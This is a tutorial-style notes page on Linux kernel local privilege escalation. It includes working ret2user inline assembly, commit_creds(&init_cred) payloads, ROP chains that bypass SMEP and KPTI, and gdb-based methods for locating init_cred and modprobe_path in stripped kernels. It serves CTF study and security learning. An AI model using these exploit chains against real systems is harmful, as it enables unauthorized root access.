kernel-tips

Basic information

exploit technique

ret2user

ret2user executes a function prepared in user space while the CPU is still in kernel mode, so the function runs with kernel privileges. Calling commit_creds(&init_cred) from that function performs LPE. To return from kernel to user space afterwards, execute swapgs followed by iretq. swapgs exchanges the current GS base with the value saved in the IA32_KERNEL_GS_BASE MSR, which switches between the kernel and user GS bases. iretq pops RIP, CS, RFLAGS, RSP, and SS from the stack, in that order, and resumes execution in user space. The stack must therefore have the following layout immediately before iretq executes.

stack
+0x00 +---------------------+ <- rsp
      |         rip         |
+0x08 +---------------------+
      |        cs           | <- user code segment
+0x10 +---------------------+
      |      rflags         | <- user cpu flag
+0x18 +---------------------+
      |        rsp          | <- user stack pointer
+0x20 +---------------------+
      |        ss           | <- user stack segment
+0x28 +---------------------+
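
The frame in the diagram can also be written as a C struct, which makes the offsets easy to check at compile time. This is only a sketch: struct iret_frame and make_iret_frame are hypothetical names that do not appear in the original exploit.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper type: the five quadwords iretq pops, in stack order. */
struct iret_frame {
    uint64_t rip;     /* +0x00: user-space instruction pointer */
    uint64_t cs;      /* +0x08: user code segment */
    uint64_t rflags;  /* +0x10: user CPU flags */
    uint64_t rsp;     /* +0x18: user stack pointer */
    uint64_t ss;      /* +0x20: user stack segment */
};

/* Compile-time checks that the layout matches the diagram. */
_Static_assert(offsetof(struct iret_frame, rip)    == 0x00, "rip at +0x00");
_Static_assert(offsetof(struct iret_frame, cs)     == 0x08, "cs at +0x08");
_Static_assert(offsetof(struct iret_frame, rflags) == 0x10, "rflags at +0x10");
_Static_assert(offsetof(struct iret_frame, rsp)    == 0x18, "rsp at +0x18");
_Static_assert(offsetof(struct iret_frame, ss)     == 0x20, "ss at +0x20");
_Static_assert(sizeof(struct iret_frame)           == 0x28, "frame is 0x28 bytes");

/* Fill a frame from user-mode register values saved earlier. */
struct iret_frame make_iret_frame(uint64_t rip, uint64_t cs, uint64_t rflags,
                                  uint64_t rsp, uint64_t ss)
{
    struct iret_frame f = { rip, cs, rflags, rsp, ss };
    return f;
}
```

The five fields correspond one to one to the last five payload entries of the ROP chains later on this page.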

The LPE and ret2user code below is based on https://pawnyable.cafe/linux-kernel/LK01/stack_overflow.html. For the inline assembly syntax, see "Assembly functions in C language" under tips.

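/* User-mode register values saved before entering the kernel. */
static unsigned long cs, ss, rsp, rflags;

/* Save the user-mode CS, SS, RSP and RFLAGS so ret2user() can restore them. */
static void refuge() {
    asm volatile (
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "movq %%rsp, %2\n"
        "pushfq\n"
        "popq %3\n"
        : "=r"(cs), "=r"(ss), "=r"(rsp), "=r"(rflags)
        :
        : "memory");
}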

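/* Build the iretq frame at the top of the current stack, then return to
 * user mode at rip. refuge() must have saved the user registers first. */
static void ret2user(unsigned long rip) {
    asm volatile ("swapgs\n");          /* switch back to the user GS base */
    asm volatile(
        "movq %0, 0x20(%%rsp)\t\n"      /* ss */
        "movq %1, 0x18(%%rsp)\t\n"      /* rsp */
        "movq %2, 0x10(%%rsp)\t\n"      /* rflags */
        "movq %3, 0x08(%%rsp)\t\n"      /* cs */
        "movq %4, 0x00(%%rsp)\t\n"      /* rip */
        "iretq"
        :
        : "r"(ss),
          "r"(rsp),
          "r"(rflags),
          "r"(cs), "r"(rip));
}

/* Runs in kernel mode: take root credentials, then return to shell(). */
void lpe() {
    //char *(*pkc)(int) = (void *)prepare_kernel_cred;
    void (*cc)(char *) = (void *)commit_creds;
    //(*cc)((*pkc)(0));
    (*cc)((void *)init_cred);           /* i.e. commit_creds(&init_cred) */
    ret2user((unsigned long)shell);
}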

SMEP is controlled by bit 20 of the CR4 register, so ret2user becomes possible again after clearing that bit in CR4 through ROP. https://ctf-wiki.org/pwn/linux/kernel-mode/exploitation/rop/bypass-smep/
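
The value to write into CR4 can be computed with a small helper. This is a minimal sketch: cr4_without_smep is a hypothetical name, and the CR4 values in the usage note are illustrative rather than read from a real machine. In a real chain the result would be loaded by a gadget that writes CR4 (for example mov cr4, rdi), which is assumed to exist in the target kernel. Recent kernels also pin the SMEP and SMAP bits when CR4 is written, so this approach may not work there.

```c
#include <stdint.h>

#define X86_CR4_SMEP (UINT64_C(1) << 20)  /* CR4 bit 20: SMEP */
#define X86_CR4_SMAP (UINT64_C(1) << 21)  /* CR4 bit 21: SMAP */

/* Return the given CR4 value with only the SMEP bit cleared. */
uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~X86_CR4_SMEP;
}
```

For example, cr4_without_smep(0x1006f0) gives 0x6f0, and cr4_without_smep(0x3006f0) gives 0x2006f0 because the SMAP bit is left untouched.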

Kernel Return Oriented Programming

When KPTI is disabled, there's no need to update the CR3 register, so LPE can be achieved by constructing the following chain:

    payload[i++] = kbase + ret;
    payload[i++] = kbase + pop_rdi_ret;
    payload[i++] = init_cred;
    payload[i++] = commit_creds;
    payload[i++] = kbase + swapgs_ret;
    payload[i++] = kbase + iretq_ret;
    payload[i++] = (unsigned long)&shell;
    payload[i++] = cs;
    payload[i++] = rflags;
    payload[i++] = rsp;
    payload[i++] = ss;

Kernel Return Oriented Programming kpti trampoline

To bypass KPTI, jump into swapgs_restore_regs_and_return_to_usermode (the "KPTI trampoline"), which switches CR3 back to the user page tables before executing swapgs and iretq. Refer to the article for the detailed call stack, and construct the following ROP chain. The trampoline executes pop rax and pop rdi on the way, so add 128 bits of padding (two 8-byte dummy values) before the iretq frame. The symbol swapgs_restore_regs_and_return_to_usermode is listed in /proc/kallsyms.

    payload[i++] = kbase + ret;
    payload[i++] = kbase + pop_rdi_ret;
    payload[i++] = init_cred;
    payload[i++] = commit_creds;
    payload[i++] = kbase + kpti_trampoline;
    payload[i++] = (unsigned long)&shell;   // padding (consumed by pop rax / pop rdi)
    payload[i++] = (unsigned long)&shell;   // padding (consumed by pop rax / pop rdi)
    payload[i++] = (unsigned long)&shell;   // rip
    payload[i++] = cs;
    payload[i++] = rflags;
    payload[i++] = rsp;
    payload[i++] = ss;

tips

Identifying kbase

cat /proc/kallsyms | head
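
The same lookup can be done from the exploit itself. The sketch below parses lines in the "address type name" format used by /proc/kallsyms; the helper names are hypothetical. It assumes that the symbol _text marks the kernel base, which should be confirmed on the target kernel. Addresses read as zero when the kernel hides them from unprivileged users.

```c
#include <stdio.h>
#include <string.h>

/* Parse one kallsyms line ("<hex addr> <type> <name>").
 * Returns 1 and stores the address if the name matches, otherwise 0. */
int kallsyms_match(const char *line, const char *want, unsigned long long *addr)
{
    unsigned long long a;
    char type;
    char name[128];

    if (sscanf(line, "%llx %c %127s", &a, &type, name) != 3)
        return 0;
    if (strcmp(name, want) != 0)
        return 0;
    *addr = a;
    return 1;
}

/* Scan /proc/kallsyms for a symbol. Returns 0 if the file cannot be opened,
 * the symbol is missing, or its address is masked. */
unsigned long long kallsyms_lookup(const char *want)
{
    char line[256];
    unsigned long long addr = 0;
    FILE *fp = fopen("/proc/kallsyms", "r");

    if (!fp)
        return 0;
    while (fgets(line, sizeof line, fp))
        if (kallsyms_match(line, want, &addr))
            break;
    fclose(fp);
    return addr;
}
```

With this, kbase could be obtained as kallsyms_lookup("_text"), and the same function can resolve commit_creds or swapgs_restore_regs_and_return_to_usermode.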

Identifying init_cred

Since Linux kernel 6.2, NULL cannot be passed to prepare_kernel_cred. Therefore, LPE using the following call is no longer possible.

commit_creds(prepare_kernel_cred(0))

The solution is simple: pass init_cred to commit_creds directly instead.

commit_creds(&init_cred)

However, the address of init_cred cannot be read directly from a stripped vmlinux, so it is easier to trace it from a function whose symbol is exported. Verified on Linux kernel 6.9.12.

Followed these cross-references using Elixir:

int kernel_read_file_from_path_initns()   (exported function)
struct task_struct init_task
struct cred init_cred

When examining the instructions of kernel_read_file_from_path_initns in IDA, the rdi passed to the first call instruction is init_task.fs.

gef> x/50i 0xffffffff9c9f01c0
   0xffffffff9c9f01c0:  endbr64 
   0xffffffff9c9f01c4:  push   rbp
   0xffffffff9c9f01c5:  mov    rbp,rsp
   0xffffffff9c9f01c8:  push   r15
   0xffffffff9c9f01ca:  push   r14
   0xffffffff9c9f01cc:  push   r13
   0xffffffff9c9f01ce:  push   r12
   0xffffffff9c9f01d0:  push   rbx
   0xffffffff9c9f01d1:  sub    rsp,0x30
   0xffffffff9c9f01d5:  mov    QWORD PTR [rsp+0x8],rsi
   0xffffffff9c9f01da:  mov    QWORD PTR [rsp],rdx
   0xffffffff9c9f01de:  mov    DWORD PTR [rsp+0x14],r9d
   0xffffffff9c9f01e3:  mov    rax,QWORD PTR gs:0x28
   0xffffffff9c9f01ec:  mov    QWORD PTR [rsp+0x28],rax
   0xffffffff9c9f01f1:  xor    eax,eax
   0xffffffff9c9f01f3:  test   rdi,rdi
   0xffffffff9c9f01f6:  je     0xffffffff9c9f02d7
   0xffffffff9c9f01fc:  cmp    BYTE PTR [rdi],0x0
   0xffffffff9c9f01ff:  mov    r15,rdi
   0xffffffff9c9f0202:  je     0xffffffff9c9f02d7
   0xffffffff9c9f0208:  mov    rdi,0xffffffff9d60ac30 <- init_task.fs
   0xffffffff9c9f020f:  mov    r14,r8
   0xffffffff9c9f0212:  mov    r13,rcx
   0xffffffff9c9f0215:  call   0xffffffff9cf9f9e0

0xffffffff9d60ab30:     0xffffffff9d638d40      0xffffffff9d638d40
                        [real_cred]             [cred]
0xffffffff9d60ab40:     0x2f72657070617773      0x0000000000000030
                        [comm]
0xffffffff9d60ab50:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ab60:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ab70:     0xffffffff9d6b3140      0xffffffff9d6b2c80
0xffffffff9d60ab80:     0x0000000000000000      0xffffffff9d638ba0
0xffffffff9d60ab90:     0xffffffff9d60c7e0      0xffffffff9d60bfc0
0xffffffff9d60aba0:     0x0000000000000000      0x0000000000000000
0xffffffff9d60abb0:     0x0000000000000000      0xffffffff9d60abb8
0xffffffff9d60abc0:     0xffffffff9d60abb8      0x0000000000000000
0xffffffff9d60abd0:     0x0000000000000000      0x0000000000000000
0xffffffff9d60abe0:     0x0000000000000000      0x0000000000000000
0xffffffff9d60abf0:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ac00:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ac10:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ac20:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ac30:     0x0000000000000000      0x0000000000000000
                        [init_task.fs]

The dump above shows the memory just before init_task.fs, and the excerpt of the task_struct definition below explains it. Near fs, task_struct contains the comm string and the real_cred and cred pointers, both of which point to init_cred. comm holds a distinctive byte sequence (here "swapper/0"), which makes it easy to locate, and the address of init_cred can then be read from the pointers just before it.

	const struct cred __rcu		*real_cred;
	const struct cred __rcu		*cred;

#ifdef CONFIG_KEYS
	struct key			*cached_requested_key;
#endif
	char				comm[TASK_COMM_LEN]; //0xffffffff81e12b80
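
The search for comm in the dump above can be sketched as follows. It assumes a little-endian host, so that the dumped quadwords reproduce the original byte order, and it takes a flag for CONFIG_KEYS because that option places cached_requested_key between cred and comm. The function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Return the index of the quadword where "swapper/0" starts, or -1.
 * The 10-byte pattern (including the NUL) spans q[i] and q[i + 1]. */
int find_comm(const uint64_t *q, size_t n)
{
    static const char comm[] = "swapper/0";

    for (size_t i = 0; i + 1 < n; i++)
        if (memcmp(&q[i], comm, sizeof comm) == 0)
            return (int)i;
    return -1;
}

/* Return the cred pointer stored just before comm, or 0 if not found.
 * has_keys: nonzero if the kernel was built with CONFIG_KEYS. */
uint64_t cred_before_comm(const uint64_t *q, size_t n, int has_keys)
{
    int i = find_comm(q, n);
    size_t back = has_keys ? 2 : 1;

    if (i < 0 || (size_t)i < back)
        return 0;
    return q[(size_t)i - back];
}
```

Applied to the four quadwords at 0xffffffff9d60ab30 in the dump, with has_keys set to 0, this returns 0xffffffff9d638d40, the value labelled cred.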

Identifying modprobe_path

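modprobe_path is another global variable commonly used in exploits. Overwriting it with the path of a prepared malicious script causes the kernel to run that script with root privileges the next time it invokes modprobe. Note that a kernel commit from the latter half of 2024 removed the classic way of triggering this (executing a file with an unknown binary format), so the technique needs a different trigger on newer kernels. https://theori.io/blog/reviving-the-modprobe-path-technique-overcoming-search-binary-handler-patch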

Since modprobe_path cannot be looked up by name in a stripped vmlinux, here is a memo on how to locate it.

__request_module has its symbol exported and references modprobe_path, so it can serve as the starting point. Get the address of __request_module from /proc/kallsyms and disassemble it with gdb.

modprobe_path is used in the following check, so the memory operand of the cmp BYTE PTR [...], 0x0 instruction is the address of modprobe_path.

	if (!modprobe_path[0])
		return -ENOENT;

gef> x/50i 0xffffffff9c8eb750
   0xffffffff9c8eb750:  endbr64 
   0xffffffff9c8eb754:  push   rbp
   0xffffffff9c8eb755:  mov    rbp,rsp
   0xffffffff9c8eb758:  push   r13
   0xffffffff9c8eb75a:  push   r12
   0xffffffff9c8eb75c:  mov    r12,rsi
   0xffffffff9c8eb75f:  push   r10
   0xffffffff9c8eb761:  lea    r10,[rbp+0x10]
   0xffffffff9c8eb765:  push   rbx
   0xffffffff9c8eb766:  mov    r13,r10
   0xffffffff9c8eb769:  mov    ebx,edi
   0xffffffff9c8eb76b:  sub    rsp,0x88
   0xffffffff9c8eb772:  mov    QWORD PTR [rbp-0x40],rdx
   0xffffffff9c8eb776:  mov    QWORD PTR [rbp-0x38],rcx
   0xffffffff9c8eb77a:  mov    QWORD PTR [rbp-0x30],r8
   0xffffffff9c8eb77e:  mov    QWORD PTR [rbp-0x28],r9
   0xffffffff9c8eb782:  mov    rax,QWORD PTR gs:0x28
   0xffffffff9c8eb78b:  mov    QWORD PTR [rbp-0x58],rax
   0xffffffff9c8eb78f:  xor    eax,eax
   0xffffffff9c8eb791:  test   dil,dil
   0xffffffff9c8eb794:  jne    0xffffffff9c8eb8e4
   0xffffffff9c8eb79a:  cmp    BYTE PTR [rip+0xdc0a9f],0x0        # 0xffffffff9d6ac240
                                        [modprobe_path]----------------------J
   0xffffffff9c8eb7a1:  je     0xffffffff9c8eb92e
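
gdb already prints the resolved address in the comment, but the same value can be computed by hand when only raw bytes are available. A RIP-relative operand is the address of the next instruction plus the signed 32-bit displacement. The helper name below is hypothetical.

```c
#include <stdint.h>

/* Resolve a RIP-relative operand: next instruction address + displacement. */
uint64_t rip_relative_target(uint64_t insn_addr, uint8_t insn_len, int32_t disp32)
{
    return insn_addr + insn_len + (uint64_t)(int64_t)disp32;
}
```

For the cmp instruction above, the instruction starts at 0xffffffff9c8eb79a and is 7 bytes long (the next instruction is at 0xffffffff9c8eb7a1), so rip_relative_target(0xffffffff9c8eb79a, 7, 0xdc0a9f) yields 0xffffffff9d6ac240.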

Identifying core_pattern

Assembly functions in C language

The asm statement is a compiler extension (GCC and Clang), not a function from stdlib.h. Its parts are as follows:

volatile
- Prevents the compiler from optimizing the asm statement away (for example, deleting it when its outputs are unused).
output operand
- Used to return the result of the assembly instructions to variables.
- Format is "constraint"(variable); for example, "=r"(dest) means the value is produced in any general-purpose register and then stored in the variable dest.
- = indicates write-only.
input operand
- Specifies variables to be used within the assembly instructions.
- Format is "constraint"(variable); for example, "r"(src) means the variable src is placed in any general-purpose register.
assembly
- Write the assembly code.
- Operands are referenced as %n (%0, %1, ...). The numbers are assigned consecutively, output operands first and then input operands.
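
A minimal sketch that puts these parts together, assuming an x86-64 target and GCC or Clang. The function add_one is a made-up example, not part of the exploit. It uses one output operand (%0) and one input operand (%1).

```c
#include <stdint.h>

/* Return src + 1 using inline assembly (x86-64, AT&T syntax).
 * __asm__ is the spelling that also compiles with -std=c11;
 * plain asm is equivalent in GNU mode. */
uint64_t add_one(uint64_t src)
{
    uint64_t dst;

    __asm__ volatile(
        "movq %1, %0\n\t"   /* %1 = input operand (src), %0 = output operand (dst) */
        "addq $1, %0\n\t"   /* dst = dst + 1 */
        : "=r"(dst)         /* output operands */
        : "r"(src)          /* input operands */
        : "cc");            /* clobbers: addq modifies the flags */
    return dst;
}
```

The three colon-separated sections after the assembly string are the output operands, the input operands, and the clobber list, in that order. refuge() above follows the same shape with four outputs and no inputs.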

Last modified: 13 July 2025